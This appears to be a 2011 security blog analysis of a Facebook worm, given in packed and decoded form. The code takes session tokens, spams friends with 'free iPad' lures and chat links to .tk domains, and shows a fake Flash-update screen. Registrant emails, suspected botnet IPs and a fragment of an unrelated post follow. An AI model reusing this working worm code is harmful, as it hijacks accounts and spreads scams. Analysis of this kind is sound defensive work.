30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 62=13.27(\'29="75" 30="([^"]+)"\');11(!62){19 38(13)}10 59=\'82://323.134\';10 14=\'37=\'+26[1]+\'&=154&35=\'+28[1]+\'&75=\'+62[1]+\'&120=\'+18+\'&153=\'+18+\'&113=52&84=&155=\'+25(59)+\'&89[91]=90&69&84&108&121&67=68\';10 21=15 34(28[1],26[1],62[1],18,53,46);10 42=15 31(\'/51/118/58/141/145.43?56=1\',14,\'252\',21)}17 226(13,18,53){10 40=\'251, 345 101 326 93 72 328 327 71 322? 321 71 316 315 317?? 318 82://320.134\';10 259=(125.314(125.319()*329)+1).254();10 253=15 330().340().254().97(\'.\',\'\');10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');11(!28||!26){19 64()}10 14=\'339=\'+253+\'&35=\'+28[1]+\'&69&341=\'+259+\'&342=\'+25(40)+\'&343=1&37=\'+26[1]+\'&67=68&338&130=\'+18+\'&337=24\';10 42=15 31(\'/51/257/129.43?56=1\',14,\'38\',24)}17 252(13,21){10 33=/29="([^"]+)" 30="([^"]+)"/45;10 14,12,86,48,41;10 53=21[4];10 40=\'251 87 247 246 102, 87 248 249 48 250 258 130 264 263 261 197. 260 93 265 106 99 48 266 262, 255 244 214 72 71. 213 93 212 106 211 99 131 101 15 215 216! 87 220 219 102\';10 83=\'218 245 217 210 72 209 202 201!\';10 46=21[5];10 57=\'82://4.199.198.142/203/204/208/207/206/205.221\';10 126=\'24\';10 74;85(12=33.79(13)){41=24;10 80=\'58[77][222][0]\';11(!86){11(!12){19 38(13)};14=\'238=0&35=\'+21[0]+\'&69&89[91]=90&37=\'+21[1]+\'&67=68&75=\'+21[2]+\'&113=52&84&108=\'+25(40)+\'&121=\'+25(40)+\'&120=\'+21[3]+\'&\'+25(12[1])+\'=\'+25(12[2]);11(83){14=14+\'&58[77][237]=\'+25(83)}86=36}20{11(12[1]==\'58[77][236]\'){12[2]=46}20 11(12[1]==80){11(57){12[2]=57;74=36}}20 11(12[1]==\'235\'){12[2]=126}11(12[1]==\'239\'){11(!48){48=36}20{41=36}}11(!41){14=14+\'&\'+25(12[1])+\'=\'+25(12[2])}}}11(!14){19 38(13)}11(!74){14=14+\'&\'+80+\'=\'+57}10 42=15 31(\'/51/52/118.43?56=1\',14,\'38\',36)}17 38(13,243){11(13.66(\'"332":0,\')!=-1){110+=1;240()}11(243){242(32,\'241\')}20{96()}}17 96(){11(61.65){10 18=61.234();10 53=54.234();11(92){233(18,53)}20{226(23.76.107,18,53)}}20{11(119!=94){119+=1}20{64()}}}96()}10 22=15 112();11(!22){331(\'127 225 333\')}20{10 61=15 34();10 54=15 34();10 32;10 110=0;10 94=2;10 224=0;10 119=0;10 114=\'82://334.142/336/335/\';10 92=0;10 98=0;228();11(117.116.66(\'232/3\')!=-1||117.116.66(\'232/4\')!=-1||117.116.66(\'230 8\')!=-1||117.116.66(\'230 9\')!=-1){94=6}137=15 34();229(23.76.107)}',10,373,'||||||||||var|if|m|res|p|new|i|function|id|return|else|vr|xO|document|false|escape|pfid|match|fbsg|name|value|hS|vw|re|Array|fb_dtsg|true|post_form_id|dF|setAttribute|msg|s|hs|php|l|g|tt|appendChild|a|v||ajax|profile|nm|nms|r|__a|pu|attachment|u|css|ids|cid|createElement|dN|length|search|post_form_id_source|AsyncRequest|lsd|fromIndex|this|you|style|si|xhpc_composerid|body|params|x|exec|imgp|push|http|dsc|xhpc_fbx|while|ic|I|pT|nctr|pagelet_tab_content|_mod|tOP|are|wt|left|pV|replace|wtot|away||the|it|setRequestHeader|eval|Content|giving|innerHTML|xhpc_message|obj|wc|window|gXMLO|xhpc_context|b|t|userAgent|navigator|composer|cb|xhpc_targetid|xhpc_message_text|viewer|token|padding|Math|pc|XMLHttpRequest|for|send|to|from|top|user|tk|indexOf|div|pool|wT|perc|text|link|com|ministory_key|feedback|scraper|profile_fbid|story_type|story_id|story_fbids|font|txt|sk|targetid|Attach|scrape_url|createTextNode|update|Here|Adobe|txtc|wall|dWPL|Click|txto|status|src|hL|POST|s3|open|GET|s2|type|dSU3|margin|dSU4|sIM|include|sIM2|Type|P|img|readyState|responseText|LoadingDiv|action_key|getElementById|onreadystatechange|Length|onbeforeunload|application|www|form|dSU2|urlencoded|remove_content|keep|blogspot|bp||too|one|_92UFpWRIzAA|S8MZBPAycKI|IMG_0858|s1600|uAvDw6RVnmw|AAAAAAAAAio|get|when|them|still|There|showing|years|overstock|know|Let|LOVE|absolutely|JPG|images|arr|tc|Not|dIM|j|sL|dSU|MSIE|prototype|Firefox|dWP|pop|no_picture|title|summary|UIThumbPager_Input|app_id|cT|cU|gW|w|Im|me|believe|cant|actually|got|free|Hey|dWPL2|tme|toString|so|hid|chat|ipad|mid|They|and|supply|out|test|only|limited|png|max|13px|align|FFFFFF|getElementsByTagName|color|center|128px|bottom|abort|If|process|now|will|absolute|ActiveXObject|head|flash|Loading|XMLHTTP|Microsoft|null|110px|gif|Interrupt|corrupt|href|Do|size|Caution|stylesheet|loader|right|media|screen|9pt|weight|ProgressDiv|10px|position|block|bolder|16px|rel|display|WarningDiv|floor|or|dancing|what|Bahahaha|random|begoneweight201|Is|video|getridoftime9|minifeed|your|hell|in|doing|4294967295|Date|alert|error|Supported|franebook|app3|usa|to_offline|pvs_time|client_time|getTime|msg_id|msg_text|num_tabs|dialog|What|nodeValue|firstChild|confirmed|typeahead|filter|first_degree|1034|v10|installation|Flash|round|Installing|updated|Receiving|options|removeChild|3000|firstName|friends_only|amp|u00253A|weithajs2|setTimeout|buddy_list|force_render|popped_out|uid'.split('|')))


Which decodes to (formatted for readability);

function gXMLO()
{
var x=false;
if(window.XMLHttpRequest)
{
x=new window.XMLHttpRequest()
}
else
{
x=new ActiveXObject('Microsoft.XMLHTTP')
}
return x
}
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
if(!Array.prototype.indexOf)
{
Array.prototype.indexOf=function(obj,fromIndex)
{
if(fromIndex==null)
{
fromIndex=0
}
else if(fromIndex<
0)
{
fromIndex=Math.max(0,this.length+fromIndex)
}
for(var i=fromIndex,j=this.length;i<j;i++)
{
if(this[i]===obj)return i
}
return-1
}
}
function include(arr,obj)
{
return(arr.indexOf(obj)!=-1)
}
function sL()
{
var hid=document.getElementsByTagName('head')[0];
var css=document.createElement('link');
css.type='text/css';
css.rel='stylesheet';
css.href=b+'style.css';
css.media='screen';
hid.appendChild(css);
var l=document.createElement('div');
l.setAttribute('id','LoadingDiv');
l.setAttribute('style','display:block; position:absolute; top: 0; right: 0; bottom: 0; left: 0;');
var i=document.createElement('img');
i.setAttribute('src',b+'flash.png');
i.setAttribute('style','padding-left: 50%; margin-left: -128px;');
l.appendChild(i);
var s='text-align: center; color: #FFFFFF; padding-top: ';
var i=document.createElement('div');
i.setAttribute('id','WarningDiv');
var p=document.createElement('P');
p.setAttribute('style',s+'10px; font-weight: bolder; font-size: 9pt;');
var t=document.createTextNode('Caution: Do Not Interrupt');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
var i=document.createElement('img');
i.setAttribute('src',b+'ajax-loader.gif');
i.setAttribute('style','padding-top: 16px; padding-left: 50%; margin-left: -110px;');
l.appendChild(i);
var i=document.createElement('div');
i.setAttribute('id','ProgressDiv');
var p=document.createElement('P');
p.setAttribute('id','txtc');
p.setAttribute('style',s+'13px;');
var t=document.createTextNode('Loading..');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
document.body.appendChild(l);
window.onbeforeunload=function()
{
return'If you abort the update process now you will corrupt your Adobe Flash installation!'
};
return
}
function cT()
{
var perc=0;
if(wc)
{
perc=Math.round(wc/wtot*100)
}
if(tOP)
{
msg='Installing'
}
else
{
msg='Receiving'
}
var txt=perc+'% updated. '+msg+' update (v10.1034) from Adobe';
var txto=document.getElementById("
txtc"
);
txto.firstChild.nodeValue=txt
}
function hL()
{
var l=document.getElementById('LoadingDiv');
document.body.removeChild(l);
window.onbeforeunload=false;return
}
function s2(res)
{
var m=res.match('"viewer":([^"]+),"token":"([^"]+)"');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/ajax/typeahead/first_degree.php?__a=1&viewer='+vw+'&token='+m[2]+'&filter[0]=user&options[0]=friends_only',false,'s3',false)
}
function s3(res)
{
nms=new Array();
ids=new Array();
var re=/"
uid"
:([^"
]+),"
type"
:"
user"
,"
text"
:"
([^"
]+)"
/g;
var m;
while(m=re.exec(res))
{
if(m[1]!=vw)
{
tc+=1;
ids.push(m[1]);
nms.push(m[2])
}
}
wtot=nms.length+wtot;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function sIM(res)
{
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var m=res.match('"viewer":([^"]+),"token":');
if(!m||!fbsg||!pfid)
{
return dN()
}
var vw=m[1];
var p='fb_dtsg='+fbsg[1]+'&force_render=true&post_form_id='+pfid[1]+'&lsd&popped_out=false&post_form_id_source=AsyncRequest&user='+vw;var hs=new hS('/ajax/chat/buddy_list.php?__a=1',p,'sIM2',false)
}
function dSU(res)
{
var m=res.match('"viewer":([^"]+),"token":');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/profile.php?id='+vw+'&sk=wall',false,'dSU2',false)
}
function dSU2(res)
{
var tt='Click Here';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://weithajs2.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+vw+'&targetid='+vw+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dSU3',vr)
}
function dSU3(res,vr)
{
var re=/name="
([^"
]+)"
value="
([^"
]+)"
/g;
var p,m,ic,a,s;
var msg='I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too';
var tt=vr[3];
var pu='http://4.bp.blogspot.com/_92UFpWRIzAA/S8MZBPAycKI/AAAAAAAAAio/uAvDw6RVnmw/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vw+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dSU4',false)
}
function dSU4(res)
{
sIM(document.body.innerHTML)
}
function sIM2(res)
{
nms=new Array();
ids=new Array();
var re=/"
([^"
]+)"
:
{
"
i"
:/g;
var m;
while(m=re.exec(res))
{
ids.push(m[1])
}
var re=/"
([^"
]+)"
:
{
"
name"
:"
([^"
]+)"
,"
firstName"
/g;
while(m=re.exec(res))
{
if(include(ids,m[1]))
{
nms.push(m[2])
}
}
if(!nms)
{
return dN()
}
wtot=nms.length;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function dN()
{
if(!tOP)
{
tOP=1;
cb=0;
s2(document.body.innerHTML)
}
else
{
setTimeout("
hL();
"
,3000)
}
return
}
function wT()
{
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
function gW(id,p)
{
var hs=new hS('/profile.php?id='+id,false,p,id)
}
function cU(res,id)
{
res=res.replace(/&
/g,'&').replace(/%/g,'');
var re=/ministory_key=(.*?)&profile_fbid=(.*?)&story_type=(.*?)&feedback=1&action_key=remove_content&story_fbids(.*?)=(.*?)u00253A(.*?)&story_id=(.*?)"
/g;
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var m;
while(m=re.exec(res))
{
var p='action_key=remove_content&confirmed=1&dialog=1&fb_dtsg='+fbsg[1]+'&feedback=1&lsd&ministory_key='+m[1]+'&nctr[_mod]=pagelet_tab_content&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&profile_fbid='+m[2]+'&story_fbids[0]='+m[5]+':'+m[6]+'&story_id='+m[7]+'&story_type='+m[3];var hs=new hS('/ajax/minifeed.php?__a=1',p,'pV',false)
}
pV()
}
function dWP(id,nm)
{
var vr=new Array(id,nm);
var hs=new hS('/profile.php?id='+id+'&sk=wall',false,'dWPL',vr)
}
function dWPL(res,vr)
{
var id=vr[0];
var nm=vr[1];
var tt='Click Here!';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://getridoftime9.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+id+'&targetid='+id+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],id,nm,tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dWPL2',vr)
}
function dIM(res,id,nm)
{
var msg='Hey, What the hell are you doing in this video? Is this dancing or what?? Bahahaha http://begoneweight201.tk';
var mid=(Math.floor(Math.random()*4294967295)+1).toString();
var tme=new Date().getTime().toString().replace('.','');
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var p='client_time='+tme+'&fb_dtsg='+fbsg[1]+'&lsd&msg_id='+mid+'&msg_text='+escape(msg)+'&num_tabs=1&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&pvs_time&to='+id+'&to_offline=false';var hs=new hS('/ajax/chat/send.php?__a=1',p,'dF',false)
}
function dWPL2(res,vr)
{
var re=/name="
([^"
]+)"
value="
([^"
]+)"
/g;
var p,m,ic,a,s;
var nm=vr[4];
var msg='Hey I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too!';
var tt=vr[5];
var pu='http://4.bp.blogspot.com/_92UFpWRIzAA/S8MZBPAycKI/AAAAAAAAAio/uAvDw6RVnmw/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vr[3]+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dF',true)
}
function dF(res,w)
{
if(res.search('"error":0,')!=-1)
{
wc+=1;
cT()
}
if(w)
{
gW(vw,'cU')
}
else
{
pV()
}
}
function pV()
{
if(ids.length)
{
var id=ids.pop();
var nm=nms.pop();
if(tOP)
{
dWP(id,nm)
}
else
{
dIM(document.body.innerHTML,id,nm)
}
}
else
{
if(cb!=wt)
{
cb+=1
}
else
{
dN()
}
}
}
pV()
}
var xO=new gXMLO();
if(!xO)
{
alert('XMLHttpRequest Not Supported')
}
else
{
var ids=new Array();
var nms=new Array();
var vw;
var wc=0;
var wt=2;
var tc=0;
var cb=0;
var b='http://franebook.com/usa/app3/';
var tOP=0;
var wtot=0;
sL();
if(navigator.userAgent.search('Firefox/3')!=-1||navigator.userAgent.search('Firefox/4')!=-1||navigator.userAgent.search('MSIE 8')!=-1||navigator.userAgent.search('MSIE 9')!=-1)
{
wt=6
}
pool=new Array();
dSU(document.body.innerHTML)}


Did you see it? The lovely loading of a .tk site;

weithajs2.tk

This goes on to load (in order);

1. pegasusstar.info/iuko.php

2. dancewithrico.info/weight7.php

3. jump.cttrk.com/aff_c?offer_id=3276&aff_id=1764

4. jump.cttrk.com/aff_r?offer_id=3276&aff_id=1764&url=http%3A%2F%2Ftrack.yourrewardinside.com%2FDefaultPage.aspx%3Fnm%3D014gjfq2jkxp%26s%3D1764e

5. track.yourrewardinside.com/DefaultPage.aspx?nm=014gjfq2jkxp&s=1764e

6. www.tracklead.net/click.track?CID=134785&AFID=138362&ADID=367060&SID=

7. fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

8. www.fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

So including pegasusstar.info and dancewithrico.info, the list now stands at (excluding the .tk site, and the sites you're redirected to such as jump.cttrk.com);

dark-dns-services.com    huang xinyi / shangmenwei@163.com    BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
cantiq.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
ipadapps4you.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
globalamc.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
loungeinthesky.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
joytronic.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
knowledge-library.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
loungeinthesky.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pelletterie2f.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
sinsung.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
spampro.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pegasusstar.info/iuko.php    Louis Pierra / louispierra@yahoo.ca    eNom, Inc. (R126-LRMS)
dancewithrico.info    Greg Wilson / gwilsonmtl88@yahoo.com    eNom, Inc. (R126-LRMS)
grapillse.com    Vasileva Svetlana / VasilevaSvetlana@mail.com    Namecheap.com
limedicg.com    Gilmutdinov Iskander / GilmutdinovIskander@mail.com    Namecheap.com
franebook.com/usa/app3/js.php    Uhb Xjj / zzkmwc4@126.com    XIN NET TECHNOLOGY CORPORATION


So far, the IPs associated with the newly created domains, along with the IPs for franebook.com, all appear to be residential IPs, leading to the likelyhood of it's being associated with a botnet (though that's speculation at present, I'm still checking). The IP details are;


1. 109.110.40.235    -    MICROSOF-917DD8    -    196949    -    196949 109.110.32.0/19 PODRYAD-AS Kozitskiy A.M. PI
2. 109.184.225.161    -    109-184-225-161.dynamic.mts-nn.ru    -    25405    -    25405 109.184.0.0/16 NMTS-AS OJSC VolgaTelecom, Nizhny Novgorod
3. 109.87.243.137    -    Failed resolution    -    13188    -    13188 109.87.128.0/17 BANKINFORM-AS Ukraine
4. 112.202.207.15    -    112.202.207.15.pldt.net    -    9299    -    9299 112.202.192.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
5. 122.173.86.128    -    ABTS-North-Dynamic-128.86.173.122.airtelbroadband.in    -    24560    -    24560 122.173.0.0/17 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
6. 122.174.84.73    -    ABTS-TN-dynamic-073.84.174.122.airtelbroadband.in    -    24560    -    24560 122.174.0.0/16 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
7. 122.3.47.21    -    122.3.47.21.pldt.net    -    9299    -    9299 122.3.32.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
8. 123.24.185.18    -    Failed resolution    -    45899    -    45899 123.24.128.0/18 VNPT-AS-VN VNPT Corp
9. 124.104.133.3    -    124.104.133.3.pldt.net    -    9299    -    9299 124.104.128.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
10. 174.6.12.212    -    S01060015b7c35258.vc.shawcable.net    -    6327    -    6327 174.0.0.0/13 SHAW - Shaw Communications Inc.
11. 178.239.117.60    -    Failed resolution    -    41989    -    41989 178.239.112.0/20 KTBAC-AS ET BAC Dobrinka Bacanova
12. 178.74.246.81    -    cpe-178-74-246-81.enet.vn.ua    -    49223    -    49223 178.74.192.0/18 EVEREST-AS _Everest_ Broadcasting Company Ltd
13. 186.18.175.203    -    cpe-186-18-175-203.telecentro-reversos.com.ar    -    27747    -    27747 186.18.172.0/22 Telecentro S.A.
14. 201.213.212.250    -    201-213-212-250.net.prima.net.ar    -    10481    -    10481 201.213.192.0/19 Prima S.A.
15. 201.254.31.122    -    201-254-31-122.speedy.com.ar    -    22927    -    22927 201.254.0.0/16 Telefonica de Argentina
16. 24.121.132.155    -    Failed resolution    -    25994    -    25994 24.121.132.0/24 NPG-001 - NPG Cable, INC
17. 24.21.222.13    -    c-24-21-222-13.hsd1.or.comcast.net    -    7922    -    33490 24.20.0.0/15 COMCAST-33490 - Comcast Cable Communications, Inc.
18. 24.34.229.143    -    c-24-34-229-143.hsd1.ma.comcast.net    -    7015    -    7015 24.34.128.0/17 COMCAST-7015 - Comcast Cable Communications Holdings, Inc
19. 46.8.157.233    -    HOME-FF4CEE39F0    -    51501    -    51501 46.8.128.0/17 KHD-AS Khabarovsk home networks Ltd
20. 61.7.189.248    -    Failed resolution    -    18252    -    18252 61.7.128.0/18 CAT-AS-AP The Communication Authoity of Thailand, CAT
21. 61.81.70.69    -    Failed resolution    -    4766    -    4766 61.80.0.0/14 KIXS-AS-KR Korea Telecom
22. 64.188.224.203    -    host-64-188-224-203.windjammercable.net    -    1246    -    1246 64.188.224.0/22 WINDJAMMER - Windjammer Communications LLC
23. 67.187.251.116    -    c-67-187-251-116.hsd1.ca.comcast.net    -    33651    -    33651 67.187.240.0/20 CMCS - Comcast Cable Communications, Inc.
24. 67.191.123.51    -    c-67-191-123-51.hsd1.fl.comcast.net    -    20214    -    20214 67.191.112.0/20 COMCAST-20214 - Comcast Cable Communications Holdings, Inc
25. 67.48.25.133    -    mta-67-48-25-133.new.res.rr.com    -    11955    -    11955 67.48.16.0/20 SCRR-11955 - Road Runner HoldCo LLC
26. 69.28.212.93    -    Failed resolution    -    13768    -    13768 69.28.212.0/22 PEER1 - Peer 1 Network Inc.
27. 71.164.175.141    -    pool-71-164-175-141.dllstx.fios.verizon.net    -    19262    -    19262 71.164.128.0/17 VZGNI-TRANSIT - Verizon Online LLC
28. 76.105.44.171    -    c-76-105-44-171.hsd1.ca.comcast.net    -    33651    -    33651 76.105.0.0/18 CMCS - Comcast Cable Communications, Inc.
29. 76.113.188.136    -    c-76-113-188-136.hsd1.mn.comcast.net    -    13367    -    13367 76.113.128.0/17 COMCAST-13367 - Comcast Cable Communications Holdings, Inc
30. 76.123.172.58    -    c-76-123-172-58.hsd1.ms.comcast.net    -    22258    -    22258 76.123.128.0/18 COMCAST-22258 - Comcast Cable Communications Holdings, Inc
31. 77.106.199.225    -    Failed resolution    -    42110    -    42110 77.106.192.0/20 STK-AS Closed Joint Stock Company Sochitelecom
32. 77.121.124.29    -    29.124.121.77.pool.smart.vn.ua    -    38962    -    38962 77.121.96.0/19 UA-SMART-AS Broadcasting company _Smart_ Ltd
33. 77.77.245.211    -    cable-77-77-245-211.dynamic.telemach.ba    -    42560    -    42560 77.77.192.0/18 BA-TELEMACH-AS Telemach BiH
34. 77.87.80.54    -    nat-77-87-80-54.gw4.omsk.multinex.ru    -    41771    -    41771 77.87.80.0/21 MKC-OMSK-AS MultiCable Networks LLC
35. 78.106.176.47    -    78-106-176-47.broadband.corbina.ru    -    8402    -    8402 78.106.176.0/21 CORBINA-AS Corbina Telecom
36. 78.36.249.208    -    78-36-249-208.dynamic.pskov.dslavangard.ru    -    8997    -    8997 78.36.0.0/15 ASN-SPBNIT OJSC North-West Telecom Autonomous System
37. 81.56.83.158    -    lan31-1-81-56-83-158.fbx.proxad.net    -    12322    -    12322 81.56.0.0/15 PROXAD Free SAS
38. 82.240.161.55    -    lam06-3-82-240-161-55.fbx.proxad.net    -    12322    -    12322 82.224.0.0/11 PROXAD Free SAS
39. 85.65.29.199    -    85.65.29.199.dynamic.barak-online.net    -    1680    -    1680 85.64.0.0/15 NV-ASN 013 NetVision Ltd.
40. 86.61.43.146    -    BSN-61-43-146.dial-up.dsl.siol.net    -    5603    -    5603 86.61.0.0/17 SIOL-NET Telekom Slovenije d.d.
41. 87.255.93.95    -    Failed resolution)    -    15836    -    15836 87.255.64.0/19 AXAUTSYS ARAX I.S.P.
42. 90.24.153.22    -    AMontsouris-551-1-18-22.w90-24.abo.wanadoo.fr)    -    3215    -    3215 90.24.128.0/17 AS3215 France Telecom - Orange
43. 91.200.74.206    -    MICROSOF-CDCC83)    -    43815    -    43815 91.200.72.0/22 MMV-AS MMV
44. 91.218.17.207    -    pool-91-218-17-207.optima-east.net)    -    48882    -    48882 91.218.16.0/22 OPTIMA-SHID-AS Optima-Shid LLC
45. 92.114.244.200    -    host-static-92-114-244-200.moldtelecom.md)    -    8926    -    8926 92.114.128.0/17 MOLDTELECOM-AS Moldtelecom Autonomous System
46. 93.124.41.254    -    host-93-124-41-254.dsl.sura.ru)    -    24612    -    24612 93.124.0.0/17 PENZA-SVIAZINFORM-AS JSC Volgatelecom, Penza branch
47. 93.170.43.94    -    93.170.43.94.airexpress.net.ua)    -    51930    -    51930 93.170.40.0/21 AIREXPRESS-AS Buzova-Budinvest Ltd.
48. 94.41.159.5    -    94.41.159.5.dynamic.ufanet.ru)    -    24955    -    24955 94.41.144.0/20 UBN-AS OJSC _Ufanet_
49. 95.69.141.135    -    customer-95-69-141-135.airbites.kh.ua)    -    42335    -    42335 95.69.128.0/18 SPHERE-UA Sphere Ltd.
50. 96.245.13.28    -    pool-96-245-13-28.phlapa.fios.verizon.net)    -    19262    -    19262 96.245.0.0/16 VZGNI-TRANSIT - Verizon Online LLC
51. 98.142.221.7    -    urlproxy.registrar-servers.com)    -    46562    -    46562 98.142.220.0/23 COLO-AT-55-LLC - Colo at 55, LLC
52. 98.196.164.102    -    c-98-196-164-102.hsd1.tx.comcast.net)    -    7922    -    33662 98.196.0.0/14 CMCS - Comcast Cable Communications, Inc.


/update 11:16

dot.tk have now suspended weithajs2.tk.

References:

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html

Saturday 5 March 2011

Eset: Here’s my support desk!

I guess someone in the general area of Kolkata reads my blog posts. At any rate, after I posted a blog yesterday bemoaning the fact that I had to do my own systems support, I got a phone call from a gentleman with a pronounced accent wanting to help me with my virus problem.

It's Raining Men (And Wooden Horses)

You didn't know I had a virus problem? Neither did I, but he assured me that I was spraying malware all over the part of town I live and work in. Well, I suppose that explains why I tripped over a Conficker and got fake AV all over my trousers on the way back from the library. And he quoted an address that was near enough to mine to convince someone who didn't know about telephone directories.

